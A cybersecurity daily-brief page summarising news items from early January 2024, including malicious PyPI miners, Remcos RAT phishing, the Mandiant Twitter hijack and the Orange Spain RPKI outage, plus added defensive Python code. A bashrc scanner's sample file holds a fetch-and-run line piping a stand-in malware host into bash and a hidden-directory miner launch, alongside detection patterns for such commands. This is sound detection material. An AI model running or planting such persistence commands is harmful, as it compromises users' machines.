Daily Brief

Find articles below, see 'DETAILS' for generated summaries

Total articles found: 12634

Checks for new stories every ~15 minutes

Title Summary
2024-01-04 10:39:23 thehackernews MALWARE Malware in Python Packages Mines Cryptocurrency on Linux
Three malicious Python packages, modularseven, driftme and catme, were found on PyPI targeting Linux hosts with cryptocurrency miners; they were downloaded 431 times before being taken down. Code inside the packages fetched the mining payload from remote servers. The operation resembled an earlier campaign built around a package called culturestreak, reusing similar domains and hosting arrangements. The newer packages added an extra stage to payload delivery to evade security tooling, and appended commands to ~/.bashrc so the miner is relaunched whenever the user opens a new shell session, which also makes it survive reboots without needing a service or cron job. The evasion techniques underline the need for stronger vetting of open-source package repositories.
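As an added illustration (not code from the article and not the malware's own logic), the Python script below is a triage check for the persistence pattern described above: it scans a ~/.bashrc for appended fetch-and-run commands, backgrounded processes and executables living in hidden directories. The indicator patterns and the sample file contents are constructed assumptions; expect some false positives (for example lines sourcing ~/.nvm) and treat hits as leads to inspect, not verdicts.

```python
"""Heuristic scan of a ~/.bashrc for appended persistence commands.

Added example, not code from the article or from the malware. The rule
patterns and SAMPLE_BASHRC are constructed for illustration only.
"""
import re
from pathlib import Path

# Each rule is (name, compiled regex). The patterns are assumptions chosen to
# catch the common "download and execute on every login" shape; tune locally.
RULES = [
    # curl/wget output piped straight into a shell
    ("remote-fetch-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b")),
    # something detached from the terminal and left running in the background
    ("backgrounded-process",
     re.compile(r"\b(nohup|setsid)\b.*&\s*$")),
    # base64 blob decoded and executed
    ("base64-decoded-command",
     re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba|z|da)?sh\b")),
    # executable under a dot-directory in /tmp, /dev/shm or the home directory
    ("hidden-dir-executable",
     re.compile(r"(^|[\s;&|])(/tmp|/dev/shm|~|\$HOME)/\.[\w.-]+/\S+")),
]


def scan_bashrc_text(text):
    """Return [(line_no, rule_name, line)] for every rule each line triggers.

    Blank lines and comments are skipped; one line may appear several times.
    """
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for name, rx in RULES:
            if rx.search(stripped):
                findings.append((no, name, stripped))
    return findings


def scan_bashrc_file(path=Path.home() / ".bashrc"):
    """Scan a real file; returns [] if it does not exist."""
    p = Path(path)
    return scan_bashrc_text(p.read_text(errors="replace")) if p.exists() else []


# Constructed sample: three ordinary lines followed by two lines modelled on
# the "append a fetch-and-run command" persistence the article describes.
SAMPLE_BASHRC = """\
# ~/.bashrc
export PATH="$HOME/bin:$PATH"
alias ll='ls -alF'
curl -fsSL http://malware.example.invalid/setup.sh | bash
nohup $HOME/.cfg/miner --config $HOME/.cfg/c.json >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for no, rule, line in scan_bashrc_text(SAMPLE_BASHRC):
        print(f"line {no}: {rule}: {line}")
```

Run it against the sample and the two appended lines are flagged (the second one twice, once as a backgrounded process and once for the hidden-directory binary) while the PATH export and alias pass. Point scan_bashrc_file at other shell startup files (~/.profile, ~/.zshrc, /etc/bash.bashrc) too, since the same trick works in any of them.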
2024-01-04 10:18:51 theregister NATION STATE ACTIVITY Chinese Balloons Detected Near Taiwan Before Elections
Four Chinese balloons were observed over the Taiwan Strait, three of them crossing Taiwan itself and passing near the Ching-Chuan-Kang air base. A balloon shot down in US airspace last year reportedly used a US internet provider for navigation and to send data back to China; the US afterwards blacklisted six entities linked to China's military and the PLA's aerospace programs. Beijing denied any deliberate airspace intrusion, but the Pentagon assessed that balloon as having intelligence-gathering capability. Taiwan's defense ministry also tracked the PLA aircraft and PLAN vessels accompanying the balloons and continues to publish updates because of their frequent appearances. Balloons over Taiwan's landmass are rare; Beijing usually describes them as weather-monitoring devices, and the purpose of these remains unconfirmed. The sightings come shortly before Taiwan's presidential and parliamentary elections, amid intensifying CCP rhetoric about "reunification."
2024-01-04 09:58:06 bleepingcomputer MISCELLANEOUS Npm 'everything' Package Disrupts JavaScript Registry
Over the holidays the npm registry was flooded with more than 3,000 packages from a single author, with knock-on effects for other npm maintainers. A package named "everything" was published that depends, through its sub-packages, on the entire npm registry, so installing it downloads millions of transitive packages and quickly exhausts local storage. Because npm does not allow a package to be unpublished while other packages depend on it, every package in the registry became a dependency of "everything" and could no longer be removed by its author. That policy was introduced after the "left-pad" incident in 2016 to keep the ecosystem stable. The creator, PatrickJS, apologized for the unintended disruption and contacted npm staff for a resolution; ironically, the same policy prevents him from removing his own packages, since they depend on one another. As mitigation, the "@everything-registry" scoped packages that "everything" depends on were made private, presumably to stop the cascade of downloads.
2024-01-04 09:01:30 thehackernews MALWARE UAC-0050 Group Employs Novel Phishing to Spread Remcos RAT
UAC-0050, a threat actor active since 2020, is using phishing to distribute the Remcos remote access trojan (RAT). Recent attacks add a new tactic, using pipes for interprocess communication, to evade antivirus and endpoint detection and response (EDR) tooling. The group targets Ukrainian and Polish entities with social engineering, often impersonating legitimate organizations to get victims to open malicious attachments. One phishing email in the campaign, aimed mainly at Ukrainian military personnel, purported to offer consultancy roles with the Israel Defense Forces (IDF). CERT-UA attributed a phishing campaign to UAC-0050 in February 2023 that delivered Remcos RAT and, in some cases, an information stealer called Meduza Stealer. Analysis of one LNK file revealed a multi-stage infection chain: staged script execution followed by downloads of additional payloads for persistence and data harvesting. Remcos can collect system information and credentials from various web browsers, further compromising infected hosts.
2024-01-04 06:33:34 thehackernews CYBERCRIME Mandiant Twitter Account Hijacked for Crypto Scam Operation
American cybersecurity firm Mandiant's Twitter account was hijacked to promote a cryptocurrency scam. The incident, where the account was renamed and used to impersonate the Phantom crypto wallet service, lasted over six hours. The scam included a fake airdrop promotion that encouraged users to visit a malicious link. It's unclear how the breach occurred, but possibilities include MFA bypass or compromise of Twitter Support staff. Mandiant, a prominent threat intelligence organization, is a subsidiary of Google Cloud following a $5.4 billion acquisition. Mandiant regained control of their Twitter account; the current security status after the incident has not been detailed. The hacker's identity remains unknown, and further details are expected when Mandiant issues a statement.
2024-01-04 00:05:28 theregister MALWARE Microsoft Disables Web-Based Windows App Installs Due to Malware
Microsoft has disabled the ms-appinstaller URI scheme after finding it being abused to deliver malware. The abuse echoes a December 2021 vulnerability in which attackers bypassed security checks through App Installer spoofing. The scheme, re-enabled in August 2022, let users install apps directly from a web page without first saving the package locally, and threat actors have been exploiting that convenience. Microsoft is working with certificate authorities to revoke the code-signing certificates used by the identified malware samples. Enterprises with the EnableMSAppInstallerProtocol group policy set to Enabled or left Not Configured, running App Installer versions v1.18.2691 to v1.21.3421 on Windows builds with updates from October 2022 to March 2023, are at risk and should update App Installer. The change adds friction to web-based installs, which now require extra steps to download and install safely.
2024-01-03 23:37:47 bleepingcomputer CYBERCRIME Mandiant's Twitter Account Hijacked to Promote Crypto Scam
Mandiant's Twitter account was taken over and used to push a cryptocurrency scam. The hijacker renamed the account to mimic the Phantom crypto wallet and advertised a fake $PHNTM token airdrop. Clicking the 'Claim Airdrop' button sent users to a site that prompted them to install the legitimate Phantom wallet, which a drainer then abused to empty their funds. Phantom recognized the scam and blocked wallet interaction with the malicious site to protect users. The hijacker later deleted the scam tweet, posted messages mocking Mandiant, and retweeted posts from the official Phantom account to appear legitimate. Mandiant's original handle @mandiant was unavailable, returning an error that the account does not exist.
2024-01-03 22:55:04 bleepingcomputer CYBERCRIME Mandiant Cybersecurity Firm's Twitter Compromised to Promote Crypto Scam
Mandiant's Twitter account was hijacked to disseminate a cryptocurrency scam, falsely representing the Phantom crypto wallet. An unauthorized actor took over Mandiant's account, changed its name to @phantomsolw, and advertised a fake airdrop of $PHNTM tokens. Users clicking on the 'Claim Airdrop' button were directed to a phishing site designed to drain cryptocurrency from their wallets. The legitimate Phantom wallet service has recognized the threat and disabled interactions with the scam website to protect users. Although the scam tweet has been deleted, the attacker continued to mock Mandiant with messages suggesting they change their password and check bookmarks. The hacker is retweeting official posts from Phantom, possibly to gain credibility for potential future scams. Mandiant's Twitter handle @mandiant is currently inaccessible, displaying a "This account doesn't exist" error message.
2024-01-03 21:31:54 theregister DATA BREACH Estes Express Lines Refuses Ransom Amid Data Breach
Estes Express Lines, a major American freight carrier, suffered a ransomware attack that potentially exposed the personal information of more than 21,000 people. The company first disclosed an IT infrastructure impact in early October and only later acknowledged ransomware. The LockBit gang claimed responsibility and allegedly published the stolen data on November 13. Estes chose not to pay the ransom, consistent with FBI and financial-regulator guidance, despite the risk of the data being released. Forensic investigation confirmed that personal information including names and Social Security numbers was taken; beyond that, the company has not detailed the stolen data, the ransom demanded, or its reasons for refusing to pay. Estes is offering affected individuals 12 months of free identity monitoring through Kroll and says it has seen no identity theft or financial loss resulting from the incident.
2024-01-03 19:44:41 bleepingcomputer CYBERCRIME Hacker Disrupts Orange Spain Internet Service via BGP Intrusion
Orange Spain's account at the RIPE NCC, the registry that holds its IP address and routing records, was compromised, and the attacker altered the company's BGP routing and RPKI configuration. The tampering changed how Orange Spain's address space was routed and caused an outage of its services. BGP itself trusts whatever routes a neighbor announces, as the Cloudflare explainer cited in the article notes; RPKI adds signed Route Origin Authorizations (ROAs) stating which AS number may originate a prefix, and networks performing route origin validation drop announcements that conflict with them. The attacker created ROAs for Orange Spain's prefixes naming a false origin AS, so Orange Spain's own announcements became RPKI-invalid and were rejected by validating networks, disrupting service. Orange Spain confirmed the outage, which lasted roughly one and a half hours, and said no customer data was compromised. The RIPE account reportedly had no two-factor authentication enabled, which may have made the takeover easier; exactly how the attacker obtained the credentials is not yet clear. Orange Spain worked to restore its services.
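To make the RPKI mechanics concrete, the Python snippet below is an added example (not code from the article, Orange Spain, RIPE NCC or Cloudflare) implementing RFC 6811 route origin validation against a list of ROAs and then walking through the failure mode described above: a prefix with no ROA is "NotFound" and accepted, but once someone publishes a ROA naming a different origin AS, the legitimate announcement becomes "Invalid" and validating networks drop it. The prefixes and AS numbers are documentation-range placeholders (RFC 5737, RFC 5398), not Orange Spain's real resources.

```python
"""Route Origin Validation (RFC 6811) against a set of ROAs.

Added example, not from the article or any of the parties it describes.
Prefixes and AS numbers are constructed from documentation ranges.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ROA:
    prefix: str       # e.g. "203.0.113.0/24"
    max_length: int   # longest prefix length the origin may announce
    origin_asn: int


def _covering_roas(route, roas):
    """ROAs whose prefix contains the announced route (same address family)."""
    out = []
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix)
        if roa_net.version == route.version and route.subnet_of(roa_net):
            out.append(roa)
    return out


def validate_route(prefix, origin_asn, roas):
    """Return 'Valid', 'Invalid' or 'NotFound' per RFC 6811 section 2."""
    route = ipaddress.ip_network(prefix)
    covering = _covering_roas(route, roas)
    if not covering:
        return "NotFound"            # no ROA covers this prefix at all
    for roa in covering:
        if roa.origin_asn == origin_asn and route.prefixlen <= roa.max_length:
            return "Valid"           # at least one ROA authorises this origin
    return "Invalid"                 # covered, but no ROA matches origin/length


def rov_accepts(state):
    """Common ROV policy: drop Invalid, accept Valid and NotFound."""
    return state != "Invalid"


def rogue_roa_scenario():
    """Model the incident shape: victim has no ROA, attacker publishes one.

    Victim AS 64496 and rogue AS 64511 are placeholder numbers (assumption).
    """
    victim_prefix, victim_asn, rogue_asn = "203.0.113.0/24", 64496, 64511
    before = validate_route(victim_prefix, victim_asn, [])
    rogue_roa = ROA(victim_prefix, 24, rogue_asn)
    after = validate_route(victim_prefix, victim_asn, [rogue_roa])
    # A ROA only grants, it never revokes: had the victim published its own
    # ROA, the rogue one alone would not invalidate the legitimate route.
    legit_roa = ROA(victim_prefix, 24, victim_asn)
    with_own_roa = validate_route(victim_prefix, victim_asn, [legit_roa, rogue_roa])
    return {"before": before, "after_rogue_roa": after, "with_own_roa": with_own_roa}


if __name__ == "__main__":
    for label, state in rogue_roa_scenario().items():
        print(f"{label:16} {state:9} accepted={rov_accepts(state)}")
```

The scenario prints NotFound (accepted), Invalid (dropped) and Valid (accepted) in turn. The last line is the practical lesson: publishing correct ROAs for your own prefixes before anyone else does removes this particular lever, which is why locking down the registry account that controls those ROAs matters as much as the BGP configuration itself.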
2024-01-03 19:39:08 bleepingcomputer CYBERCRIME Nigerian Hacker Charged for $7.5M Charity BEC Scheme
A Nigerian hacker, Olusegun Samson Adejorin, was arrested in Ghana for defrauding U.S.-based charitable organizations of over $7.5 million through business email compromise (BEC) attacks. The fraud took place between June and August 2020, with Adejorin unlawfully accessing email accounts and impersonating charity organization employees to request fund transfers. Adejorin misled one charity into transferring millions to bank accounts under his control by posing as another charity that received investment services from them, using stolen credentials. He faces up to 20 years in prison for wire fraud, in addition to five years for unauthorized computer access and a mandatory two-year sentence for aggravated identity theft, potentially extended by seven years for domain name abuse. The U.S. Department of Justice highlighted the extent of damage BEC attacks can cause, citing an FBI report detailing billions in losses. Defense strategies against BEC attacks include multi-factor authentication, email filtering, and establishing verification procedures for wire transfers, such as confirming changes in banking details through a secondary communication channel.
2024-01-03 17:57:11 bleepingcomputer MISCELLANEOUS PornHub and Other Sites Block NC and Montana Access Over Laws
Adult media conglomerate Aylo has restricted access to its websites, including PornHub, in Montana and North Carolina due to new age verification laws effective January 1st. The laws stipulate that adult content providers use "reasonable age verification methods," with non-compliance opening them to lawsuits from individuals. Besides PornHub, Aylo's blockade affects its other properties such as RedTube and Brazzers, which now show a video statement explaining the decision upon access attempts from the restricted states. Aylo argues that the legislation, while well-meaning, could lead to fewer safeguards and compromises user privacy by requiring frequent ID checks. The measures have reportedly led to a surge in VPN usage, although providers may need to block VPNs or assume all VPN traffic originates from the regulated states to comply fully. Concerns have been raised over the potential switch to less secure VPNs in response to the crackdown, which may expose users to malware and security risks.
2024-01-03 17:15:48 bleepingcomputer DATA BREACH LastPass Enforces Stronger Master Passwords Post-Breaches
LastPass now enforces a 12-character minimum for master passwords for all users; previously, shorter passwords were still allowed. Twelve characters has been the default for new accounts since 2018, but older accounts could keep shorter passwords until now. Alongside this, new or reset master passwords are checked against a database of credentials known to have been exposed on the dark web, and users are alerted on a match. Users already saw significant disruption from a forced multi-factor authentication (MFA) re-enrollment in May 2023. These hardening measures follow the August and November 2022 breaches in which attackers accessed LastPass's development environment and copied customer vault data; attackers have since been linked to $4.4 million in cryptocurrency theft by cracking weak master passwords from the stolen vaults. LastPass is informing B2C customers of the change immediately and B2B customers from January 10th, so that all accounts meet the updated requirements.
2024-01-03 16:24:14 bleepingcomputer DATA BREACH Data Breach at HealthEC Affects 4.5 Million Patients Nationwide
HealthEC LLC experienced a data breach impacting an estimated 4.5 million individuals who received care from the company's clients. Unauthorized access to HealthEC's systems occurred between July 14 and July 23, 2023, resulting in theft of files containing sensitive patient data. The breach was reported on December 22, 2023, following an investigation that concluded on October 24. Patient data types compromised include personal and health information, necessitating vigilance against identity theft and fraud. Patients are advised to monitor account statements, benefit explanations, and credit reports for unusual activities. A recent report to Maine's Attorney General disclosed that 112,005 individuals were affected from just one client, MD Valuecare, highlighting a fraction of the total breach. The U.S. Department of Health and Human Services' breach portal updated to reflect the larger scale of the breach, with 4,452,782 total affected individuals across 17 healthcare providers and systems including notable entities such as Corewell Health and the State of Tennessee – Division of TennCare.
2024-01-03 15:47:58 theregister MISCELLANEOUS Atos Negotiates Sale of Cybersecurity Division to Airbus
French IT firm Atos is in talks with Airbus to sell its Big Data & Security division, seeking to alleviate its financial strain. The potential deal, valued at €1.5-1.8 billion, fits Airbus's aim to expand its cybersecurity capabilities as a European aerospace and defense leader. Atos is considering a "major asset disposal program" to address its maturing debts totaling €4.8 billion between 2024 and 2029. Atos' financial strategies include new bank financing, accessing capital markets, and improving working capital to manage its substantial debt. Previous attempts to sell parts of Atos, including a joint bid of €4.2 billion for BDS rejected by the board, reflect the ongoing restructuring challenges. The company's leadership has seen significant turnover, with three CEOs in the past three years and a shuffle in the board of directors to strengthen finance and transformation expertise. The sales effort comes amidst political concerns in France over national security, with calls for possible nationalization to protect sensitive projects managed by Atos' cybersecurity wing.